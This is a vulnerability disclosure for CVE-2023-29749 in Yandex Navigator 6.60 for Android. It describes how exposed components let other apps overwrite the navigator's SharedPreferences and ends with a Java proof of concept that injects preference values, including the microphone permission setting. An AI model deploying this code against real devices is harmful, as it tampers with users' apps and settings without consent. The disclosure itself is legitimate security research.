Headline
CVE-2023-29749: SO-CVEs/CVE detailed.md at main · LianKee/SO-CVEs
An issue found in Yandex Navigator v.6.60 for Android allows unauthorized apps to cause escalation of privilege attacks by manipulating the SharedPreference files.
Escalation of Privileges exists in Yandex Navigator(CVE-2023-29749)
Vendor: Yandex (https://yandex.com/)
Affected product: Yandex Navigator(ru.yandex.yandexnavi)
Version: 6.60
Download link:https://play.google.com/store/apps/details?id=ru.yandex.yandexnavi&pli=1
Description of the vulnerability for use in the CVE:An issue found in Yandex Navigator v.6.60 allows unauthorized apps to cause escalation of privilege attacks by manipulating the SharedPreference files.
Additional information: The Yandex Navigator application allows unauthorized applications to modify the data in its SharedPreference file, which is loaded into memory for use at application startup, thus affecting the implementation of certain features of the application. For example, an attacker can modify the “notification-enabled” value in the ru.yandex.yandexnavi.preferences.xml file through the interface provided in the exposed components of the Yandex Navigator application. This can turn off the search box in the notification bar of the application, affecting the normal functionality of the application and causing an escalation of privilege attack. In fact, attacker can insert data into any SharedPreferences file whose name start with 'ru.yandex.yandexnavi.’, like ‘ru.yandex.yandexnavi.ui.PermissionDelegateImpl.PREFERENCES’ . In fact, I found that there are many SharedPreferences files like this and they store a lot of important data.
poc:
public void attack_ru() { ComponentName componentName = new ComponentName("ru.yandex.yandexnavi", “ru.yandex.common.clid.ClidService”); Intent intent = new Intent(); intent.setComponent(componentName); intent.putExtra("service_version", 0); intent.setAction(“ru.yandex.common.clid.update_preferences”); intent.putExtra("preferences", “ui.PermissionDelegateImpl.PREFERENCES”); intent.putExtra("application", “ru.yandex.yandexnavi”); Bundle bundle = new Bundle(); Bundle bundle2 = new Bundle(); Bundle bundle3 = new Bundle(); bundle2.putBoolean("MICROPHONE", false); long time = 1657202353619L; bundle3.putLong("MICROPHONE", time); bundle.putBundle("bundle-values", bundle2); bundle.putBundle("bundle-time", bundle3); intent.putExtra("bundle", bundle); ServiceConnection connection = new ServiceConnection() { @Override public void onServiceConnected(ComponentName name, IBinder service) { } @Override public void onServiceDisconnected(ComponentName name) { } }; bindService(intent, connection, BIND_AUTO_CREATE); }